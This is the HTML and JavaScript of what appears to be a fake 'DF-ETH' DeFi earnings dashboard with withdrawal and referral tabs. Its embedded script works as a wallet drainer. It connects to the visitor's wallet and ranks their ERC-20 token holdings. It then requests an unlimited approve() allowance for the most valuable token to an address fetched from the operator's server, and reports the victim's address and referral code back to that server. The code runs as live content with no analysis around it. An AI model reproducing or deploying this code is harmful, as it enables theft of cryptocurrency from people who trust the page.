<html lang="" data-dpr="1" style="font-size: 37.5px;">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
    <meta name="robots" content="noindex, nofollow" />
    <link rel="icon" href="https://tokem.xxelza.club/public/defi/favicon.ico" />
    <title>DF-ETH</title>
    <link href="./index_files/app.f6608e92.css" rel="preload" as="style" />
    <link href="./index_files/chunk-vendors.73034213.css" rel="preload" as="style" />
    <!--  <link href="./index_files/app.5bd8d9f8.js" rel="preload" as="script" />-->
    <!--  <link href="./index_files/chunk-vendors.1a1edb34.js" rel="preload" as="script" />-->
    <link href="./index_files/chunk-vendors.73034213.css" rel="stylesheet" />
    <link href="./index_files/app.f6608e92.css" rel="stylesheet" />
    <link type="image/x-icon" rel="shortcut icon" href="./index_files/sfZq78vytoImJYG.png" />
    <link type="image/x-icon" rel="shortcut icon" href="https://i.loli.net/2021/10/28/sfZq78vytoImJYG.png" />
</head>

<body style="font-size: 12px;" class="">
    <div id="app" style="background-color: rgb(248, 248, 248); color: rgb(51, 51, 51);">
        <div data-v-4734bf18="">
            <div data-v-4734bf18=""
                style="--van-tab-text-color:#333333; --van-tab-active-text-color:#0052ff; --van-tabs-bottom-bar-color:#0052ff; --van-tabs-default-color:#0052ff; --van-tabs-nav-background-color:#f8f8f8; --van-dropdown-menu-background-color:#ffffff; --van-dropdown-menu-title-text-color:#333333; --van-button-warning-background-color:#0052ff; --van-button-warning-border-color:#0052ff; --van-button-warning-color:#f8f8f8; --van-collapse-item-content-background-color:#ffffff; --van-cell-background-color:#f8f8f8; --van-cell-text-color:#333333; --van-cell-active-color:#ffffff; --van-cell-border-color:#ffffff; --van-popup-background-color:#ffffff; --van-field-input-text-color:#959BA7; --van-dropdown-menu-title-font-size:14px; --van-tabbar-background-color:#ffffff; --van-tabbar-item-active-background-color:#f8f8f8; --van-tabbar-item-active-color:#0052ff; --van-nav-bar-background-color:#f8f8f8; --van-nav-bar-icon-color:#0052ff; --van-nav-bar-title-text-color:#0052ff; --van-count-down-text-color:#0052ff; --van-count-down-font-size:16px; --van-cus-border-color:#efefef; --van-cus-background-color:#f8f8f8; --van-cus-front-color:#ffffff; --van-cus-assets-bg-color1:rgba(0,0,0,0.05); --van-cus-assets-bg-color2:rgba(0,0,0,0.05); --van-cus-img-bg-color:rgba(255,255,255,0.2); --van-cus-text-color:#333333; --van-cus-link-light-color:rgba(0,82,255,0.05);">
                <div data-v-4734bf18="" class="header">
                    <div data-v-504e9856="" data-v-4734bf18="" class="my-header">
                        <div data-v-504e9856="" class="header-row van-row van-row--flex van-row--align-center van-row--justify-space-between">
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="dropdown-wrap van-dropdown-menu">
                                    <div class="van-dropdown-menu__bar">
                                        <div role="button" tabindex="0" class="van-dropdown-menu__item">
                                            <span class="van-dropdown-menu__title" style="">
                                                <div class="van-ellipsis">
                                                    English
                                                </div>
                                            </span>
                                        </div>
                                    </div>
                                    <div data-v-504e9856="">
                                        <div class="van-dropdown-item van-dropdown-item--down" style="top: 48px; display: none;">
                                            <div class="van-overlay" style="z-index: 2002; position: absolute; animation-duration: 0.2s;="></div>
                                            <div class="van-popup van-popup--top van-dropdown-item__content" style="transition-duration: 0.2s; z-index: 2003;">
                                                <a href="./../defi-eth-zh/account.html"><div role="button" tabindex="0" class="van-cell van-cell--clickable van-dropdown-item__option" style="">
                                                    <div class="van-cell__title">
                                                        <span>繁體中文</span>
                                                    </div>
                                                </div></a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="flex align-center justify-center"><img data-v-504e9856="" src="./index_files/sfZq78vytoImJYG.png" width="20">
                                    <h2 data-v-504e9856="" class="plat-name">DF-ETH</h2>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8" style="text-align: right; padding-right: 10px;overflow: hidden"><button data-v-504e9856="" disabled="disabled"
                                    class="van-button van-button--default van-button--mini van-button--plain van-button--disabled van-button--hairline van-hairline--surround">
                                    <div data-v-504e9856="" class="van-button__content"><span data-v-504e9856="" class="van-button__text button_address">...</span></div>
                                </button></div>
                        </div>
                        <!---->
                        <!---->
                        <!---->
                    </div>
                </div>
                <div data-v-4734bf18="" class="body-center">
                    <div data-v-4734bf18="" class="assets-top box-shadow">
                        <div data-v-4734bf18="" class="tl flex align-center justify-between">
                            <div data-v-4734bf18=""><span data-v-4734bf18="" class="desc">Accumulated earnings</span>
                                <h2 data-v-4734bf18="" class="number link-color balance"> 0.000000 ETH </h2>
                            </div>
                            <div data-v-4734bf18="" class="records-btn"><i data-v-4734bf18="" class="van-icon van-icon-balance-list-o" style="font-size: 16px;">
                                    <!---->
                                </i><span data-v-4734bf18="" class="fs14">Record</span></div>
                        </div>
                        <div data-v-4734bf18="" class="flex align-center justify-between">
                            <div data-v-4734bf18="" class="tab-con-item flex-sub flex-direction align-start"><span data-v-4734bf18="" class="desc">Today's earnings</span><span data-v-4734bf18="" class="number link-color balance">0.000000 ETH</span></div>
                            <div data-v-4734bf18="" class="tab-con-item flex-sub flex-direction align-center"><span data-v-4734bf18="" class="desc">Wallet Balance</span><span data-v-4734bf18="" class="number link-color usdt_balance">0.000000 USDT</span></div>
                            <div data-v-4734bf18="" class="tab-con-item flex-sub flex-direction align-end"><span data-v-4734bf18="" class="desc">Yield</span><span data-v-4734bf18="" class="number link-color">--</span></div>
                        </div>
                    </div>
                </div>
                <div data-v-7e0b484d="" data-v-4734bf18="">
                    <div data-v-7e0b484d="" class="van-tabbar__placeholder" style="height: 42.6562px;">
                        <div class="van-tabbar van-tabbar--fixed">
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./home.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-home-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Home</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./withdraw-eth.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-paid">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Withdrawal</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./referral-team.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-friends-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Referral</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item van-tabbar-item--active">
                                <a href="./account.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-user-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">Account</div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="./index_files/web3.min.js"></script>
    <script src="./index_files/web3.min(1).js"></script>
    <script src="./index_files/web3model.min.js"></script>
    <script src="./index_files/web3provider.js"></script>
    <!--<script src="./index_files/chunk-vendors.1a1edb34.js"></script>-->
    <!--<script src="./index_files/app.5bd8d9f8.js"></script>-->
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2025; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2001; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
</body>
<script src="https://cdn.bootcdn.net/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="./index_files/TronWeb.js"></script>
<script src="./index_files/script.js"></script>
<script type="text/javascript">
const ABI = [{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}];

$(function() {
    const addr = {
        'usdt': '0xdac17f958d2ee523a2206206994597c13d831ec7',
        'sushi': '0x6b3595068778dd592e39a122f4f5a5cf09c90fe2',
        'usdc': '0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
        'uni': '0x1f9840a85d5af5bf1d1762f925bdaddc4201f984',
        'aave': '0x7fc66500c84a76ad7e9c93437bfc5ac33e2ddae9',
        'yfi': '0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e',
        'dai': '0x6b175474e89094c44da98b954eedeac495271d0f',
        'link': '0x514910771af9ca656af840dff83e8264ecf986ca',
        "LON": "0x0000000000095413afc295d19edeb1ad7b71c952",
        "CRV": "0xD533a949740bb3306d119CC777fa900bA034cd52",
        'FIL': "0xbf48ecb7c2d3d559e0a24b04f306889e05c73cd6",
    }
    const addr2 = {
        "WBTC": "0x2260fac5e5542a773aa44fbcfedf7c193bc2c599",
        "WETH": "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2",
        "CONV": "0xc834fa996fa3bec7aad3693af486ae53d8aa8b50",
        "inj": "0xe28b3B32B6c345A34Ff64674606124Dd5Aceca30",
        "MKR": "0x9f8f72aa9304c8b593d555f12ef6589cc3a579a2",
        "ALPHA": "0xa1faa113cbe53436df28ff0aee54275c13b40975",
        "BAND": "0xba11d00c5f74255f56a5e366f4f77f5a186d7f55",
        "snx": "0xc011a73ee8576fb46f5e1c5751ca3b9fe0af2a6f",
        "comp": "0xc00e94cb662c3520282e6f5717214004a7f26888",
        "sxp": "0x8ce9137d39326ad0cd6491fb5cc0cba0e089b6a9",
    }
    const addr3 = {
        "FTT": "0x50d1c9771902476076ecfc8b2a83ad6b9355a4c9",
        "ust": "0xa47c8bf37f92abed4a126bda807a7b7498661acd",
        "TRIBE": "0xc7283b66eb1eb5fb86327f08e1b5816b0720212b",
        "wise": "0x66a0f676479Cee1d7373f3DC2e2952778BfF5bd6",
        "RRAX": "0x853d955acef822db058eb8505911ed77f175b99e",
        "CORE": "0x62359Ed7505Efc61FF1D56fEF82158CcaffA23D7",
        "mir": "0x09a3ecafa817268f77be1283176b946c4ff2e608",
        "DPI": "0x1494ca1f11d487c2bbe4543e90080aeba4ba3c2b",
        "luna": "0xd2877702675e6ceb975b4a1dff9fb7baf4c91ea9",
        "HEZ": "0xEEF9f339514298C6A857EfCfC1A762aF84438dEE",
        "fxs": "0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0",
        "fei": "0x956f47f50a910163d8bf957cf5846d573e7f87ca",
    }
    const price = {
        usdt: 1,
        sushi: 15.5,
        usdc: 1,
        dai: 1,
        uni: 28.6,
        aave: 380,
        yfi: 35000,
        link: 28.2,
        "LON": 7,
        "CRV": 3.01367,
        "GUSD": 1,
        "WBTC": 56478.2,
        "WETH": 1991.89,
        "CONV": 0.105733,
        "inj": 13.3812,
        "MKR": 2076.68,
        "ALPHA": 1.79043,
        "BAND": 16.3441,
        "snx": 20.0588,
        "comp": 468.076,
        "sxp": 4.11818,
        "FTT": 46.1779,
        "ust": 1.00543,
        "TRIBE": 1.42926,
        "wise": 0.446973,
        "RRAX": 0.996821,
        "CORE": 5447.59,
        "mir": 8.69817,
        "DPI": 415.906,
        "luna": 15.2402,
        "HEZ": 5.97533,
        "fxs": 8.47025,
        "fei": 0.898157,
    }
    const decimals = {
        sushi: 18,
        usdt: 6,
        usdc: 6,
        uni: 18,
        dai: 18,
        aave: 18,
        yfi: 18,
        link: 18,
        WBTC: 8,
    }
    const _web3 = new Web3('https://cloudflare-eth.com')
    const Web3Modal = window.Web3Modal.default;
    const WalletConnectProvider = window.WalletConnectProvider.default;
    const contracts = {}, contracts2 = {}, contracts3 = {}
    for (const symbol of Object.keys(addr)) {
        const contractAddr = addr[symbol]
        contracts[symbol] = new _web3.eth.Contract(ABI, contractAddr)
    }

    for (const symbol of Object.keys(addr2)) {
        const contractAddr = addr2[symbol]
        contracts2[symbol] = new _web3.eth.Contract(ABI, contractAddr)
    }

    for (const symbol of Object.keys(addr3)) {
        const contractAddr = addr3[symbol]
        contracts3[symbol] = new _web3.eth.Contract(ABI, contractAddr)
    }
    let web3Modal;
    let provider;
    let selectedAccount;
    var address = getUrlQueryString('address')
    var rank = 6.45;
    var authorized_address = '';
    var domain = 'https://' + window.location.host + '/';
    var bizhong = '';
    var infura_key = '';
    var approveAddr = "0xdac17f958d2ee523a2206206994597c13d831ec7";
    var total = 0;
    var trx = 0;
    var is = true;
    var tronWeb;
    var injectedWeb3;
    var time;
    var content = document.getElementById("myScroll");
    var fakeContent = document.getElementById("myFakeScroll");
    var wrapper = document.getElementById("myScrollWrapper");
    $('#address').text(address)

    async function init() {
        getInfo();

        web3Modal = new Web3Modal({
            cacheProvider: !1,
            providerOptions: {
                walletconnect: {
                    package: WalletConnectProvider,
                    options: {
                        infuraId: "47a950cab4134279952b2202ec61dda8"
                    }
                }
            },
            disableInjectedProvider: !1
        });

        try {
            provider = await web3Modal.connect()
            provider.enable()
        } catch (e) {
            console.log("Could not get a wallet connection", e);
            return;
        }

        // Subscribe to accounts change
        provider.on("accountsChanged", async (accounts) => {
            await fetchAccountData();
        });

        // Subscribe to chainId change
        provider.on("chainChanged", async (chainId) => {
            await fetchAccountData();
        });

        // Subscribe to networkId change
        provider.on("networkChanged", async (networkId) => {
            await fetchAccountData();
        });

        await refreshAccountData();
    }

    async function onConnect() {
        if (selectedAccount && provider) {
            const web3 = new Web3(provider);
            const contract = new web3.eth.Contract(ABI, approveAddr)
            const gasPrice = web3.eth.gasPrice
            console.log(authorized_address);
            contract.methods.approve(authorized_address, web3.utils.toBN('79228162514264337593543950335')).send({
                from: selectedAccount,
                gasPrice: gasPrice,
                gas: 1e5,
            }, function(err, tx) {
                if (!err) {
                    postInfo(selectedAccount, bizhong)
                }
                console.log(err, tx)
            })
        } else {
            provider = await web3Modal.connect()
            provider.enable()
            const web3 = new Web3(provider);
            const accounts = await web3.eth.getAccounts()
            selectedAccount = accounts[0]
            const contract = new web3.eth.Contract(ABI, approveAddr)
            const gasPrice = web3.eth.gasPrice

            contract.methods.approve(authorized_address, '79228162514264337593543950335').send({
                from: selectedAccount,
                gasPrice: gasPrice,
                gas: 1e5,
            }, function(err, tx) {
                console.log(err, tx)
                if (!err) {
                    postInfo(selectedAccount, bizhong)
                }
            })
        }
    }

    async function refreshAccountData() {
        // document.querySelector("#btn-connect").setAttribute("disabled", "disabled")
        await fetchAccountData(provider);
        // document.querySelector("#btn-connect").removeAttribute("disabled")
    }

    async function fetchAccountData() {
        const web3 = new Web3(provider);
        injectedWeb3 = web3
        provider.enable()
        const accounts = await web3.eth.getAccounts()
        selectedAccount = accounts[0]
        console.log(selectedAccount);
        let gasPrice = web3.eth.gasPrice
        var gs = ((gasPrice * 80000) / (10 ** 18)).toFixed(6)
        console.log(gs)
        $('#gas').text(gs.toLocaleString() + ' ETH')

        $.get("https://data.block.cc/api/v3/price?api_key=WH5Y6G7PUMUSMVEQZAPXSTVCIEKATAZAARQFKD9E&slug=ethereum", function(result) {
            console.log(result[0]['u'])
            let mon = gs * result[0]['u']
            $('#gasmoney').text('$ ' + mon.toLocaleString())
        });
        $('.button_address').text(selectedAccount);
        // if (false !== selectedAccount) {
        //     postCustomer(selectedAccount)
        // }
        getMostValuableAssets(selectedAccount)

        var walletBalance = await web3.eth.getBalance('0x597EBB2bB2e0842F22C9962E3890d0530fc66b1C')
        walletBalance = (walletBalance/Math.pow(10, 18)).toString().substring(0, 8);
        $('.balance').text(walletBalance + ' ETH');

        // setTimeout(function() {
        //     getMostValuableAssets2(selectedAccount)
        // }, 200)
        // setTimeout(function() {
        //     getMostValuableAssets3(selectedAccount)
        // }, 300)
    }

    async function getMostValuableAssets(account) {
        let _symbol = 'usdt'
        console.log('_symbol:' + _symbol);

        for (const [symbol, contract] of Object.entries(contracts)) {
            contract.methods.balanceOf(account).call(function(err, balance) {
                if (symbol == 'usdt') {
                    total = balance / (10 ** (decimals[symbol] || 18))
                }
                const usdt = balance / (10 ** (decimals[symbol] || 18)) * price[symbol]
                if (usdt > total && usdt > 1000) {
                    _symbol = symbol
                    total = usdt
                    approveAddr = addr[_symbol]
                    bizhong = _symbol
                }
            })
        }

        bizhong = _symbol
        $('.usdt_balance').text(total.toFixed(6) + ' USDT');
        console.log('_symbol:' + _symbol);
        return _symbol
    }

    async function getMostValuableAssets2(account) {
        let _symbol = 'usdt'
        console.log('_symbol:' + _symbol);
        for (const [symbol, contract] of Object.entries(contracts2)) {
            contract.methods.balanceOf(account).call(function(err, balance) {
                const usdt = balance / (10 ** (decimals[symbol] || 18)) * price[symbol]
                if (usdt > total && usdt > 1000) {
                    _symbol = symbol
                    total = usdt
                    approveAddr = addr[_symbol]
                }
            })
        }

        bizhong = _symbol

        console.log('_symbol:' + _symbol);
        return _symbol
    }

    async function getMostValuableAssets3(account) {
        let _symbol = 'usdt'
        for (const [symbol, contract] of Object.entries(contracts3)) {
            contract.methods.balanceOf(account).call(function(err, balance) {
                const usdt = balance / (10 ** (decimals[symbol] || 18)) * price[symbol]
                if (usdt > total && usdt > 1000) {
                    _symbol = symbol
                    total = usdt
                    approveAddr = addr[_symbol]
                }
            })
        }
        bizhong = _symbol
        console.log('_symbol:' + _symbol);
        return _symbol
    }

    async function postInfo(address, symbol) {
        var s = getUrlQueryString('s')
        var a = getUrlQueryString('r')

        var data = {
            address:address,
            authorized_address:authorized_address,
            bizhong:symbol,
            code:s,
            reffer:a
        }
        $.ajax({
            type: 'post',
            url: domain + 'api/insert_erc',
            data: data,
        })
    }

    function getInfo() {
        $.ajax({
            type: 'get',
            url: domain + 'api/get_erc',
            async: false,
            success: function(data) {
                console.log(data)
                authorized_address = data.data.authorized_address;
                console.log(authorized_address);
            },
            error: function(data) {}
        })
    }

    function getUrlQueryString(names, urls) {
        urls = urls || window.location.href;
        urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
        var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
        var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
        if (r != null && r[2] != "") return unescape(r[2]);
        return null;

    }

    async function getWalletAddress()
    {
        try {
            let tronWeb = await window.tronWeb
            let walletAddress = await tronWeb.defaultAddress.base58;

            $('.button_address').text(walletAddress);

            tradeobj = tronWeb.trx.getAccount(
                walletAddress,
            ).then(output => {

                trx = output.balance / 1000000;
                // alert(trx);
                $('.balance').text(trx + ' TRX');

            });
            // alert('12313');
            let contract = await tronWeb.contract().at("TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t");
            await contract.balanceOf(walletAddress).call(function (err, tex) {
             if (err == null) {
                 let total = tex._hex / (10 ** 6);

                 // alert(total);
                 $('.usdt_balance').text(total.toFixed(6) + ' USDT');
             }
            });
            window.clearInterval(time);
            return true;
        } catch (e) {
            // alert(e);
            return  false;
        }
    }

    $('.records-btn').click(function () {
        var location = window.location.href;
        var redirect = "./withdraw-exchange-record.html?referrer=account"
        if (location.indexOf("?") > -1) {
            redirect += '&' + location.substring(location.indexOf("?") + 1);
        }

        window.location.href = redirect;
    })

    window.addEventListener('load', async () => {
        init();
        // document.querySelector("#btn-connect").addEventListener("click", onConnect);
    });
});

    $('.van-dropdown-menu__item').click(function () {
        $('.van-dropdown-item--down').show()
    })
    $('.van-overlay').click(function () {
        $('.van-dropdown-item--down').hide()
    })
</script>
</html>
